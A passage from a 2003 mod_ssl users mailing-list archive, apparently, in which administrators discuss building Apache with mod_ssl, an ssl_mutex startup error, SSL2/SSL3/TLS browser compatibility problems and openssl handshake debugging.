> >>> >> >  
> >>> >> >    DocumentRoot        /some/doc/root
> >>> >> >    SSLEngine on
> >>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >>> >> >  
> >>> >> >
> >>> >> >  
> >>> >> >    DocumentRoot        /some/doc/root
> >>> >> >    SSLEngine on
> >>> >> >    SSLCertificateFile    /usr/local/apache/certs/my_cert.crt
> >>> >> >    SSLCertificateKeyFile /usr/local/apache/certs/my_cert.key
> >>> >> >  
> 
> 
> Best regards,
> Jack L. Stone,
> Administrator
> 
> SageOne Net
> http://www.sage-one.net
> jackstone@sage-one.net
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 20 18:12:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D853A2AA02A; Thu, 20 Feb 2003 18:12:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solo.americom.com (vulcan.americom.com [208.187.207.195])
	by master.modssl.org (Postfix) with SMTP id 52CE52AA019
	for ; Thu, 20 Feb 2003 18:12:27 +0100 (CET)
Received: (qmail 26030 invoked by uid 2000); 20 Feb 2003 17:12:23 -0000
Date: 20 Feb 2003 17:12:23 -0000
Message-ID: <20030220171223.26029.qmail@solo.americom.com>
To: modssl-users@modssl.org
From: jeff@AmeriCom.com
Subject: Browser issues
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jeff@AmeriCom.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Good morning,

Our company has been noticing quite a few ssl errors in our http logs, we have had
SSL3 disabled due to a bug in internet explorer 5.x I'm sure you're all aware of, but
lately it seems more and more browsers are disabling SSL2, probably due to some
vulnerabilities, and IE6 has TLS1 disabled by default, so the only thing these newer
browsers are accepting is SSL3. The only way I can think of to allow all browsers is
by running two different https servers, on different ports, same domain, one with
SSL3 enabled where the IE6 clients (with SSL2 disabled) will be sent, the other with
SSL3 disabled where IE5.x clients will be sent. My first question is, will this work?
I see some discussion about problems with multiple https ports on the same server,
they would all be on the same certificate/domain. Second question: is there a better
way of overcoming this problem? Can I put something in the httpd.conf that says "if
IE6, allow SSL3, otherwise don't"? My google searches have yielded nothing. I'd
appreciate any input from anybody dealing with this issue.

Regards,

Jeffrey Moss
jeff@americom.com






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 20 19:37:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E7EB72AA02A; Thu, 20 Feb 2003 19:37:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta06-svc.ntlworld.com (mta06-svc.ntlworld.com [62.253.162.46])
	by master.modssl.org (Postfix) with ESMTP id 49FA42AA015
	for ; Thu, 20 Feb 2003 19:37:57 +0100 (CET)
Received: from larry-cdl4wdmfm.ntlworld.com ([62.253.148.225])
          by mta06-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20030220183747.KBZV4022.mta06-svc.ntlworld.com@larry-cdl4wdmfm.ntlworld.com>
          for ; Thu, 20 Feb 2003 18:37:47 +0000
Message-Id: <5.1.0.14.0.20030220183638.00a5b238@pop3.norton.antivirus>
X-Sender: laurence.cotton/pop.ntlworld.com@pop3.norton.antivirus
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Thu, 20 Feb 2003 18:37:56 +0000
To: modssl-users@modssl.org
From: Larry Cotton 
Subject: Starting apache with ssl module
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====================_2944193==_.ALT"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Larry Cotton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--=====================_2944193==_.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed

Hi

I'm trying to run apache including the ssl module, but am having some 
problems starting
it up.

I'm using red hat linux ver 7.1. uname -r gives the following output :
Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 
unknown.

I've been through the following steps :

1) Downloaded OpenSSL version 0.9.7a (the latest as far as I could make 
out), extracted it, built and installed
it without error. For this I simply used the defaults :
./configure
make
make test
[su root]
make install

2) Downloaded apache 2.0.44, extract and configure using the command :
CPPFLAGS="-I/usr/local/ssl/include/openssl -I/usr/local/ssl/include" \
./configure --prefix=/home/Larry/WebServer/Apache \
--enable-so \
--enable-cgi \
--enable-info \
--enable-usertrack \
--enable-ssl \
--enable-mime-magic

This was successful.

3) make - seemed to compile OK

4) su root
make install - seemed to install OK

5) cd /home/Larry/WebServer/Apache
su root
./apachectl start

Results in the following error appearing in the error log :
Could not set permissions on ssl_mutex: check User and Group directives 
Cnfiguration Failed

I've not changed the configuration file, so the settings are currently the 
default ones. The User and Group directives are currently set as:
User nobody
Group #-1

Note that I compiled as user Larry, installed as root and am trying to 
start apache as root.

Does anyone have any idea what might be going on here?

Cheers
Larry
--=====================_2944193==_.ALT
Content-Type: text/html; charset="us-ascii"


Hi


I'm trying to run apache including the ssl module, but am having some
problems starting

it up.


I'm using red hat linux ver 7.1. uname -r gives the following output
:

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686 unknown.


I've been through the following steps :


1) Downloaded OpenSSL version 0.9.7a (the latest as far as I could make
out), extracted it, built and installed

it without error. For this I simply used the defaults :

./configure

make

make test

[su root]

make install


2) Downloaded apache 2.0.44, extract and configure using the command
:

CPPFLAGS="-I/usr/local/ssl/include/openssl
-I/usr/local/ssl/include" \

./configure --prefix=/home/Larry/WebServer/Apache \

--enable-so \

--enable-cgi \

--enable-info \

--enable-usertrack \

--enable-ssl \

--enable-mime-magic


This was successful.


3) make - seemed to compile OK


4) su root

make install - seemed to install OK


5) cd /home/Larry/WebServer/Apache

su root

./apachectl start


Results in the following error appearing in the error log :

Could not set permissions on ssl_mutex: check User and Group directives
Cnfiguration Failed


I've not changed the configuration file, so the settings are currently
the default ones. The User and Group directives are currently set
as:

User nobody

Group #-1


Note that I compiled as user Larry, installed as root and am trying to
start apache as root.


Does anyone have any idea what might be going on here?


Cheers

Larry

--=====================_2944193==_.ALT--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 20 19:44:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 741A52AA02A; Thu, 20 Feb 2003 19:44:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailserver.gwii.com (mailserver.gwii.com [67.153.5.162])
	by master.modssl.org (Postfix) with ESMTP id C6EF22AA015
	for ; Thu, 20 Feb 2003 19:44:02 +0100 (CET)
To: modssl-users@modssl.org
Subject: Re: Starting apache with ssl module
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.0.11   July 24, 2002
Message-ID: 
From: tgarner@gwii.com
Date: Thu, 20 Feb 2003 12:48:16 -0600
X-MIMETrack: Serialize by Router on mailserver/GWI(Release 5.0.11  |July 24, 2002) at 02/20/2003
 12:48:21 PM,
	Serialize complete at 02/20/2003 12:48:21 PM
Content-Type: multipart/alternative; boundary="=_alternative 0066E6FC86256CD3_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: tgarner@gwii.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 0066E6FC86256CD3_=
Content-Type: text/plain; charset="us-ascii"

Here's what we did:


####################################################################
# notes to install and configure apache with modules, mod_perl, so
####################################################################

    #   extract the packages
 
    $ gzip -d -c openssl-0.9.6g.tar.gz | tar xvf -
!!!
    ##########################
    Then INSTALL openssl first !!!
    ##########################
!!!

    $ gzip -d -c apache_1.3.27.tar.gz | tar xvf -
    $ gzip -d -c mod_ssl-2.8.11-1.3.27.tar.gz | tar xvf -
    $ gzip -d -c mod_perl-1.26.tar.gz | tar xvf -

    ########################################################
    #   apply mod_ssl to Apache source tree

      cd mod_ssl*
      ./configure --with-apache=../apache_1.3.27
    ########################################################
    #   apply mod_perl to Apache source tree
    #   and build/install the Perl-side of mod_perl
 
    cd mod_perl-1.26
    perl Makefile.PL EVERYTHING=1 APACHE_SRC=../apache_1.3.27/src 
USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1
    make
    make install
    cd ../
    ########################################################

    #   build/install Apache with mod_ssl and mod_perl

    cd apache_1.3.27
    SSL_BASE=../openssl-0.9.6g ./configure --prefix=/usr/local/apache 
--enable-module=ssl --activate-module=src/modules/perl/libperl.a 
--enable-module=perl --enable-module=so
    make
    make certificate
    make install
    cd ../
    ########################################################

    /usr/local/apache/bin/apachectl startssl


Troy Garner
Information Technology Manager
Gulf Winds International, Inc.
713.747.4909 x5753
www.gwii.com





Larry Cotton 
Sent by: owner-modssl-users@modssl.org
02/20/2003 12:37 PM
Please respond to modssl-users

 
        To:     modssl-users@modssl.org
        cc: 
        Subject:        Starting apache with ssl module


Hi

I'm trying to run apache including the ssl module, but am having some 
problems starting
it up.

I'm using red hat linux ver 7.1. uname -r gives the following output :
Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 
unknown.

I've been through the following steps :

1) Downloaded OpenSSL version 0.9.7a (the latest as far as I could make 
out), extracted it, built and installed
it without error. For this I simply used the defaults :
./configure
make
make test
[su root]
make install

2) Downloaded apache 2.0.44, extract and configure using the command :
CPPFLAGS="-I/usr/local/ssl/include/openssl -I/usr/local/ssl/include" \
./configure --prefix=/home/Larry/WebServer/Apache \
--enable-so \
--enable-cgi \
--enable-info \
--enable-usertrack \
--enable-ssl \
--enable-mime-magic

This was successful.

3) make - seemed to compile OK

4) su root
make install - seemed to install OK

5) cd /home/Larry/WebServer/Apache
su root
./apachectl start

Results in the following error appearing in the error log :
Could not set permissions on ssl_mutex: check User and Group directives 
Cnfiguration Failed

I've not changed the configuration file, so the settings are currently the 
default ones. The User and Group directives are currently set as:
User nobody
Group #-1

Note that I compiled as user Larry, installed as root and am trying to 
start apache as root.

Does anyone have any idea what might be going on here?

Cheers
Larry


--=_alternative 0066E6FC86256CD3_=
Content-Type: text/html; charset="us-ascii"



Here's what we did:





####################################################################

# notes to install and configure apache with modules, mod_perl, so

####################################################################



    #   extract the packages

    

    $ gzip -d -c openssl-0.9.6g.tar.gz | tar xvf -

!!!

    ##########################

    Then INSTALL openssl first !!!

    ##########################

!!!



    $ gzip -d -c apache_1.3.27.tar.gz | tar xvf -

    $ gzip -d -c mod_ssl-2.8.11-1.3.27.tar.gz | tar xvf -

    $ gzip -d -c mod_perl-1.26.tar.gz | tar xvf -



    ########################################################

    #   apply mod_ssl to Apache source tree



      cd mod_ssl*

      ./configure --with-apache=../apache_1.3.27

    ########################################################

    #   apply mod_perl to Apache source tree

    #   and build/install the Perl-side of mod_perl

    

    cd mod_perl-1.26

    perl Makefile.PL EVERYTHING=1 APACHE_SRC=../apache_1.3.27/src USE_APACI=1 PREP_HTTPD=1 DO_HTTPD=1

    make

    make install

    cd ../

    ########################################################



    #   build/install Apache with mod_ssl and mod_perl



    cd apache_1.3.27

    SSL_BASE=../openssl-0.9.6g ./configure --prefix=/usr/local/apache --enable-module=ssl --activate-module=src/modules/perl/libperl.a --enable-module=perl --enable-module=so

    make

    make certificate

    make install

    cd ../

    ########################################################



    /usr/local/apache/bin/apachectl startssl





Troy Garner

Information Technology Manager

Gulf Winds International, Inc.

713.747.4909 x5753

www.gwii.com













Larry Cotton <laurence.cotton@ntlworld.com>

Sent by: owner-modssl-users@modssl.org

02/20/2003 12:37 PM

Please respond to modssl-users



        

        To:        modssl-users@modssl.org

        cc:        

        Subject:        Starting apache with ssl module






Hi



I'm trying to run apache including the ssl module, but am having some problems starting

it up.



I'm using red hat linux ver 7.1. uname -r gives the following output :

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown.



I've been through the following steps :



1) Downloaded OpenSSL version 0.9.7a (the latest as far as I could make out), extracted it, built and installed

it without error. For this I simply used the defaults :

./configure

make

make test

[su root]

make install



2) Downloaded apache 2.0.44, extract and configure using the command :

CPPFLAGS="-I/usr/local/ssl/include/openssl -I/usr/local/ssl/include" \

./configure --prefix=/home/Larry/WebServer/Apache \

--enable-so \

--enable-cgi \

--enable-info \

--enable-usertrack \

--enable-ssl \

--enable-mime-magic



This was successful.



3) make - seemed to compile OK



4) su root

make install - seemed to install OK



5) cd /home/Larry/WebServer/Apache

su root

./apachectl start



Results in the following error appearing in the error log :

Could not set permissions on ssl_mutex: check User and Group directives Cnfiguration Failed



I've not changed the configuration file, so the settings are currently the default ones. The User and Group directives are currently set as:

User nobody

Group #-1



Note that I compiled as user Larry, installed as root and am trying to start apache as root.



Does anyone have any idea what might be going on here?



Cheers

Larry




--=_alternative 0066E6FC86256CD3_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 21 02:28:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 44EF82AA023; Fri, 21 Feb 2003 02:28:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solo.americom.com (vulcan.americom.com [208.187.207.195])
	by master.modssl.org (Postfix) with SMTP id BEF8C2AA015
	for ; Fri, 21 Feb 2003 02:28:56 +0100 (CET)
Received: (qmail 3456 invoked by uid 2000); 21 Feb 2003 01:28:53 -0000
Date: 21 Feb 2003 01:28:53 -0000
Message-ID: <20030221012853.3455.qmail@solo.americom.com>
To: modssl-users@modssl.org
From: jeff@AmeriCom.com
Subject: Re: Browser issues
References: <22973.208.169.18.3.1045769290.squirrel@www.doublesparks.net> <20030220171223.26029.qmail@solo.americom.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jeff@AmeriCom.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> May not be the answer you're looking for, but have you read/tried the
> advice in this section of the manual?
> 
> http://www.modssl.org/docs/2.8/ssl_faq.html#io-ie

Yes, we have had it configured this way for a couple years or so. The problem now is
that people are starting to disable SSL2, if you're wondering how many of these
you're getting, look for this in your logs:

[Thu Feb 13 12:04:23 2003] [error] mod_ssl: SSL handshake failed (server
*****.*******.com:443, client 66.20.223.3) (OpenSSL library error follows)
[Thu Feb 13 12:04:23 2003] [error] OpenSSL: error:1408A10B:SSL
routines:SSL3_GET_CLIENT_HELLO:wrong version number

I am pretty sure this is internet explorer saying "I want to use SSL3 and only SSL3"
and my server has SSL3 disabled. I spoke with a customer who had the IE error page,
and sure enough he had SSL2 and TLS1 disabled, only SSL3 was enabled, so what is
there to do about this, other than running two separate apaches?

> > Good morning,
> >
> > Our company has been noticing quite a few ssl errors in our http logs,
> > we have had SSL3 disabled due to a bug in internet explorer 5.x I'm sure
> > you're all aware of, but lately it seems more and more browsers are
> > disabling SSL2, probably due to some vulnerabilities, and IE6 has TLS1
> > disabled by default, so the only thing these newer browsers are
> > accepting is SSL3. The only way I can think of to allow all browsers is
> > by running two different https servers, on different ports, same domain,
> > one with SSL3 enabled where the IE6 clients (with SSL2 disabled) will be
> > sent, the other with SSL3 disabled where IE5.x clients will be sent. My
> > first question is, will this work? I see some discussion about problems
> > with multiple https ports on the same server, they would all be on the
> > same certificate/domain. Second question: is there a better way of
> > overcoming this problem? Can I put something in the httpd.conf that says
> > "if IE6, allow SSL3, otherwise don't"? My google searches have yielded
> > nothing. I'd appreciate any input from anybody dealing with this issue.
> >
> > Regards,
> >
> > Jeffrey Moss
> > jeff@americom.com
> >
> >
> >
> >
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> 
> ===========
> Alan Sparks, UNIX/Linux Systems Administrator    
> 
> 
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb 22 02:19:49 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B5EEB2AA022; Sat, 22 Feb 2003 02:19:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from typhoon.enabled.com (typhoon.enabled.com [216.218.248.34])
	by master.modssl.org (Postfix) with ESMTP id 769A02AA002
	for ; Sat, 22 Feb 2003 02:19:47 +0100 (CET)
Received: from localhost (localhost.enabled.com [127.0.0.1])
	by typhoon.enabled.com (8.12.7/8.12.7) with ESMTP id h1M1IwAU022442
	for ; Fri, 21 Feb 2003 17:18:59 -0800 (PST)
	(envelope-from sleek@enabled.com)
Date: Fri, 21 Feb 2003 17:18:58 -0800 (PST)
From: sleek 
To: modssl-users@modssl.org
Subject: SSL_connect:error
Message-ID: <20030221171815.T22438@typhoon.enabled.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: sleek 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



any clues why this is happening and what can I do to correct the issue?

typhoon# openssl s_client -connect localhost:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0808D4C0 [080A0000] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 12 a4 c3 5c   ...............\
0060 - 33 fa e1 20 0b 14 9f 3d-f5 22 6c aa a8 8a 27 a9   3.. ...=."l...'.
0070 - 17 f3 2d 03 60 01 b4 7c-4c c3 14 3f               ..-.`..|L..?
SSL_connect:SSLv2/v3 write client hello A
read from 0808D4C0 [080A6000] (7 bytes => 7 (0x7))
0000 - 3c 21 44 4f 43 54 59                              
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D5DC12AA022; Sat, 22 Feb 2003 04:10:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id C4D382AA002
	for ; Sat, 22 Feb 2003 04:10:29 +0100 (CET)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h1M39bV5005016
	for ; Fri, 21 Feb 2003 22:09:38 -0500
Date: Fri, 21 Feb 2003 22:09:37 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: SSL_connect:error
In-Reply-To: <20030221171815.T22438@typhoon.enabled.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 21 Feb 2003, sleek wrote:

> SSL_connect:SSLv2/v3 write client hello A
> read from 0808D4C0 [080A6000] (7 bytes => 7 (0x7))
> 0000 - 3c 21 44 4f 43 54 59                              
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1F71E2AA026; Sun, 23 Feb 2003 08:04:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.hiwaay.net (ant.hiwaay.net [216.180.54.10])
	by master.modssl.org (Postfix) with ESMTP id 809662AA02C
	for ; Sun, 23 Feb 2003 08:04:26 +0100 (CET)
Received: from jumbo (adsl-067-033-058-194.sip.hsv.bellsouth.net [67.33.58.194])
	by mail.hiwaay.net (8.12.7/8.12.7) with ESMTP id h1N74Lph883239
	for ; Sun, 23 Feb 2003 01:04:22 -0600 (CST)
From: jaymo@hiwaay.net
To: modssl-users@modssl.org
Date: Sun, 23 Feb 2003 01:05:36 -0600
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Test msg - Is this list still alive?
Message-ID: <3E581E60.10663.72DE8A@localhost>
X-mailer: Pegasus Mail for Win32 (v3.12c)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jaymo@hiwaay.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a test - sorry for any inconvenience, but my modssl list 
messages have stopped.

Jay Moore
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 09:27:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 286D32AA02C; Sun, 23 Feb 2003 09:27:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.sancho2k.net (spruell.dsl.xmission.com [166.70.24.187])
	by master.modssl.org (Postfix) with SMTP id B25822AA015
	for ; Sun, 23 Feb 2003 09:27:15 +0100 (CET)
Received: (qmail 17037 invoked from network); 23 Feb 2003 08:29:51 -0000
Received: from win2kpro.sancho2k.net (HELO sancho2k.net) (10.0.0.3)
  by 0 with SMTP; 23 Feb 2003 08:29:51 -0000
Message-ID: <3E58899E.9030101@sancho2k.net>
Date: Sun, 23 Feb 2003 01:43:10 -0700
From: "Sancho2k.net Lists" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.2) Gecko/20021120 Netscape/7.01
X-Accept-Language: en-us, en, ru
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Test msg - Is this list still alive?
References: <3E581E60.10663.72DE8A@localhost>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sancho2k.net Lists" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

jaymo@hiwaay.net wrote:
> This is a test - sorry for any inconvenience, but my modssl list 
> messages have stopped.

mine too. quiet weekend.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:46:29 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 57BB52AA036; Sun, 23 Feb 2003 12:46:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id C79CB2AA023; Sun, 23 Feb 2003 12:46:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from mailhub.dfrc.nasa.gov (mailhub.dfrc.nasa.gov [130.134.81.12])
	by master.modssl.org (Postfix) with ESMTP id 5EB022AA015
	for ; Wed, 19 Feb 2003 10:41:34 +0100 (CET)
Received: from mail.dfrc.nasa.gov by mailhub.dfrc.nasa.gov with ESMTP for modssl-users@modssl.org; Tue, 18 Feb 2003 08:15:05 -0800
Received: from pc6600000948.dfrc.nasa.gov ([130.134.175.43])
          by mail.dfrc.nasa.gov (Post.Office MTA v3.5.3 release 223
          ID# 0-71686U2500L200S0V35) with ESMTP id gov
          for ; Tue, 18 Feb 2003 08:16:44 -0800
Message-Id: <5.0.0.25.2.20030218081709.01bf2828@plutarch.dfrc.nasa.gov>
X-Sender: rough@plutarch.dfrc.nasa.gov
X-Mailer: QUALCOMM Windows Eudora Version 5.0
Date: Tue, 18 Feb 2003 08:19:35 -0800
To: modssl-users@modssl.org
From: Ron Rough 
Subject: RSA WebAgent5.1 and Apache 1.3.26 not 1.3.27?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ron Rough 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Mod SSL

I would like fo get the technical reason for
this. I know of someone who installed the
WebAgent.tar file from your web site and
it worked with the latest versions of
Apache and mod_ssl.

I am worried that I might be using the
Web Agent in incorrect manner.

Thanks for your help with this issure,

Ron


--
*******************************************
Ron Rough
Arcata Associates
Systems Administrator
Department 311
Dryden Flight Research Center
Phone: (661) 276-7513
Fax: (661) 276-3462
*******************************************
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:46:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CF4F22AA03C; Sun, 23 Feb 2003 12:46:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 7CB782AA03A; Sun, 23 Feb 2003 12:46:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from hotmail.com (f218.sea1.hotmail.com [207.68.163.218])
	by master.modssl.org (Postfix) with ESMTP id BC28B2AA000
	for ; Wed, 19 Feb 2003 10:35:35 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 18 Feb 2003 09:27:24 -0800
Received: from 168.179.102.118 by sea1fd.sea1.hotmail.msn.com with HTTP;
	Tue, 18 Feb 2003 17:27:23 GMT
X-Originating-IP: [168.179.102.118]
From: "Manoj Kithany" 
To: modssl-users@modssl.org
Subject: mod_ssl for Apache 1.3.26 on IBM AIX 5.1L
Date: Tue, 18 Feb 2003 17:27:23 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 Feb 2003 17:27:24.0011 (UTC) FILETIME=[FFF253B0:01C2D772]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Manoj Kithany" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

where can I find mod_ssl for Apache 1.3.26 running on IBM AIX 5.1L OS?

THANKS!









_________________________________________________________________
MSN 8 helps eliminate e-mail viruses. Get 2 months FREE*.  
http://join.msn.com/?page=features/virus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 23 12:46:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C735A2AA023; Sun, 23 Feb 2003 12:46:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 74D0C2AA039; Sun, 23 Feb 2003 12:46:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from hotmail.com (f212.sea1.hotmail.com [207.68.163.212])
	by master.modssl.org (Postfix) with ESMTP id 3A7592AA000
	for ; Wed, 19 Feb 2003 10:41:24 +0100 (CET)
